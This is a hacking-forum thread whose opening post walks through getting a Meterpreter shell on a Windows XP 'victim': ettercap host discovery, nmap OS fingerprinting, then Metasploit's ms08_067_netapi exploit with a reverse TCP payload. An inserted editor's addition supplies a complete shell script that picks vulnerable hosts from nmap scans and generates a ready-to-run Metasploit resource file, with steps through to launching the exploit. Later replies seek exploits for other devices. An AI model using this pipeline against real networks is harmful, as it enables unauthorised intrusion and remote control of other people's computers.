Basics of gaining access. (HOW TO GAIN ACCESS)

#1
How to get a Meterpreter shell.


In this tutorial I am using BackTrack 4 R2 and I am going to show you how to get a Meterpreter shell.


Here are the basics of gaining any type of shell.


How do we check for live hosts?

First we are going to scan to check what ports are open and do OS (Operating System) fingerprinting. But before we do that you're probably wondering how we check whether people are on the network and, if they are, what their IP addresses are. What I do, and what I believe is by far the easiest way, is running ettercap. So let's run ettercap: open up a console and type in ettercap -G, and ettercap will open up.


[Hidden content]



[Image: 1.png]


Then ettercap opens up.


[Image: 2.png]


Now you can use hotkeys like I do to make yourself look 1337 in front of people, but for now we'll just use the mouse: SNIFF > UNIFIED SNIFF and choose your interface. Mine is going to be vmnet1 because my Windows XP installation is in VMware. Yours might be wlan0 if you're on a wireless network or eth0 if you're connected by LAN.


[Image: 3.png]


Now let's scan: HOSTS > SCAN FOR HOSTS. I recommend you scan a couple of times, then HOSTS > HOST LIST and you get your list.


[Image: 4.png]


How do we scan for ports and know what OS he's using?

Okay, pick an IP address from the list and remember it. Now open up a new console to scan the victim with nmap. Nmap has a lot of options, so it's really easy to get confused, but I don't want to talk too much about it just yet. So now back to our console: type in nmap -O [your victim's IP]. The -O option is operating system detection. Then you should get something like this. Now just by looking at this we know it's a Windows XP box with our favorite port open: 445, SMB.


[Hidden content]


[Image: 5.png]


Now what do we do with our favorite port and all this information?

Now let's open up Metasploit.


[Hidden content]


[Image: 6.png]


***TIP***

Always run svnup before starting your attack to update Metasploit. You also need to know your IP address; if you don't know how to find it, type in ifconfig.



Now we know the port number we want to attack: it was 445, SMB. Let's use one of the best exploits out right now, ms08_067_netapi; it will never fail you on an XP system, trust me on this. Now that we know what exploit we are going to use, let's set our payload. The payload is the type of shell you want to spawn; it could be a VNC, a cmd or a Meterpreter. In this tutorial we are going for a reverse TCP Meterpreter, which means he will connect to you.

[Hidden content]



[Image: 7.png]


Now let's see what options we need to set in order to launch the exploit. Type in show options and you will get something like what I have below. Do you see where it says Required: yes? That means fill it out. The first thing we see is RHOST (remote host), which is the victim's IP address; the next thing is LHOST (local host), our IP address.


[Hidden content]



[Image: 8.png]

[Image: 9.png]


Now let's run it. If everything goes well, then you should get something like what I got.


[Hidden content]



[Image: 10.png]


What can I do now?



That will be for my next tutorial, which is all dedicated to post-exploitation fun. Meanwhile I have a couple of posts you can check out, like how to [link] or [link].





BTW, this took me more than 5 hours; I tried my best to make it n00b friendly. Hope this helps you guys.
Reply
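The procedure in the post above (find live hosts, scan them for 445/tcp and the OS, then fill in RHOST and LHOST for ms08_067_netapi) as one scriptable pipeline. This is an added example written by the editor, not code from the original poster. It assumes nmap and msfconsole are installed; the scan text and the 192.168.56.x addresses are constructed lab data, and the script name used in the comments is hypothetical. Two practitioner points are folded in: nmap's greppable output (`-oG -`, from a `-sn` sweep or the `-O` scan itself) replaces the ettercap GUI step when you want something repeatable, and the generated resource file ends with `check` rather than `exploit`, because ms08_067_netapi picks its target from the SMB fingerprint and a wrong target can crash the service instead of returning a shell.

```shell
#!/bin/sh
# Added example (the editor's, not code from the original post): the post's
# three manual steps as one repeatable pipeline.
#   1. scan  : nmap -O -p 135,139,445 -oG - <subnet>     (greppable output)
#   2. select: hosts with 445/tcp open whose OS guess the module has a target for
#   3. emit  : an msfconsole resource file, run with   msfconsole -q -r <file>
# Module, payload and option names are the real Metasploit ones. The scan text
# and the 192.168.56.x addresses are constructed lab data.

# Constructed sample of `nmap -O -p 135,139,445 -oG -` output. Real -oG fields
# are tab-separated; spaces are used here and the parsing below only relies on
# whitespace, so either form works.
SAMPLE_SCAN='# Nmap 7.94 scan initiated as: nmap -O -p 135,139,445 -oG - 192.168.56.0/24
Host: 192.168.56.101 ()  Status: Up
Host: 192.168.56.101 ()  Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///  OS: Microsoft Windows XP SP2 or SP3  Seq Index: 257  IP ID Seq: Incremental
Host: 192.168.56.102 ()  Status: Up
Host: 192.168.56.102 ()  Ports: 135/closed/tcp//msrpc///, 139/closed/tcp//netbios-ssn///, 445/closed/tcp//microsoft-ds///  OS: Linux 5.X  Seq Index: 259  IP ID Seq: All zeros
Host: 192.168.56.103 ()  Status: Up
Host: 192.168.56.103 ()  Ports: 445/open/tcp//microsoft-ds///  Ignored State: filtered (2)  OS: Microsoft Windows Server 2008 R2  Seq Index: 260  IP ID Seq: Incremental
# Nmap done: 256 IP addresses (3 hosts up) scanned'

# Set SCAN_FILE to a real .gnmap file to use a live scan instead of the sample.
scan_lines() {
    if [ -n "${SCAN_FILE:-}" ]; then cat "$SCAN_FILE"; else printf '%s\n' "$SAMPLE_SCAN"; fi
}

# IPs whose "Ports:" line lists <port>/open. nmap -oG puts a space or ", "
# before every port entry, which keeps 445 from matching 1445.
hosts_with_open_port() {
    scan_lines | grep -E "^Host: .*[[:space:],]$1/open/" | awk '{ print $2 }' | sort -u
}

# nmap's OS guess for one IP; empty if nmap produced none.
os_guess() {
    scan_lines | grep "^Host: $1 " | grep 'OS: ' |
        sed 's/.*OS: //; s/[[:space:]]*Seq Index:.*//'
}

# Shape check for the LHOST you pass in (the address ifconfig / ip addr shows).
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# Resource script for one target. RHOSTS is the current option name; RHOST,
# as typed in the post, is still accepted as an alias. The script ends with
# `check` so the module's own SMB fingerprint is consulted before you type
# `exploit`: a wrong target on this memory-corruption bug can crash the service.
gen_rc() {
    rhost="$1"; lhost="$2"; lport="${3:-4444}"
    cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOSTS $rhost
set LHOST $lhost
set LPORT $lport
show options
check
EOF
}

# Resource script (stdout) for every candidate; progress goes to stderr.
# Only OS versions ms08_067_netapi has targets for (2000 / XP / 2003) qualify.
main() {
    lhost="${1:-192.168.56.1}"
    is_ipv4 "$lhost" || { echo "LHOST '$lhost' is not an IPv4 address" >&2; return 1; }
    for ip in $(hosts_with_open_port 445); do
        os="$(os_guess "$ip")"
        case "$os" in
            *"Windows 2000"*|*"Windows XP"*|*"Windows Server 2003"*)
                echo "candidate $ip ($os)" >&2
                gen_rc "$ip" "$lhost" ;;
            *)
                echo "skipping $ip ($os): ms08_067_netapi has no target for it" >&2 ;;
        esac
    done
}

# Usage (script name is hypothetical):
#   sh ms08_067_rc.sh <your LHOST> > ms08_067.rc && msfconsole -q -r ms08_067.rc
main "$@"
```

Once msfconsole has loaded the resource file and `check` reports the host as vulnerable, type `exploit` in that console; the rest of the session is exactly the Meterpreter prompt shown in the post. With the sample data only 192.168.56.101 produces a resource block: 192.168.56.103 has 445 open too, but its OS guess is one the module has no target for, which is the check the post's "never fails on XP" shortcut skips.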

#2
Great!!! A question though: how do you update Metasploit? Where can you view exploits? And what is the best exploit for an Apple Time Capsule? :smile:

Great tut :smile: Thanks!!!
Reply

#3
awesome thanks!!!
Reply

#4
Thanks 1llusion.
Now, to update Metasploit, once in ./msfconsole type in


[Hidden content]


Now, to show exploits, just run the command


[Hidden content]


You also might wanna try show payloads if you're feeling confident


[Hidden content]


and, you know, show options


[Hidden content]


For Apple exploits I'm not really sure, but try searching for an Apple exploit like this


[Hidden content]


but let me look into it for you, kk
Reply

#5
Quote: (04-08-2011, 03:15 PM) 1llusion Wrote:

awesome thanks!!! :smile:

Hey 1llusion, are you in Linux? If not, hit me up on IM.
Reply

#6
Quote: (04-08-2011, 03:28 PM) enc0de Wrote:

Quote: (04-08-2011, 03:26 PM) 1llusion Wrote:

Quote: (04-08-2011, 03:17 PM) enc0de Wrote:

Quote: (04-08-2011, 03:15 PM) 1llusion Wrote:

awesome thanks!!! :smile:

Hey 1llusion, are you in Linux? If not, hit me up on IM.

I'm in Linux... sorry... Windows is not working :biggrin: gtg soon anyway, I'll make the vid when I come back :smile:

thanks for your help!!!

No problem, it's good you're stuck in Linux for now so you get the hang of it.

haha yes :biggrin: I used to use Ubuntu for like 2 weeks :smile: but that was a long time ago
Reply

#7
Quote: (04-08-2011, 03:17 PM) enc0de Wrote:

Quote: (04-08-2011, 03:15 PM) 1llusion Wrote:

awesome thanks!!! :smile:

Hey 1llusion, are you in Linux? If not, hit me up on IM.

I'm in Linux... sorry... Windows is not working :biggrin: gtg soon anyway, I'll make the vid when I come back :smile:

thanks for your help!!!
Reply

#8
Quote: (04-08-2011, 03:26 PM) 1llusion Wrote:

Quote: (04-08-2011, 03:17 PM) enc0de Wrote:

Quote: (04-08-2011, 03:15 PM) 1llusion Wrote:

awesome thanks!!! :smile:

Hey 1llusion, are you in Linux? If not, hit me up on IM.

I'm in Linux... sorry... Windows is not working :biggrin: gtg soon anyway, I'll make the vid when I come back :smile:

thanks for your help!!!

No problem, it's good you're stuck in Linux for now so you get the hang of it.
Reply

#9
That's good, Ubuntu is awesome. Hey, don't forget BackTrack 5 is coming soooooon, can't wait to see their all-new environment.
Reply

#10

[Hidden content]

What can I do with this error?
Reply


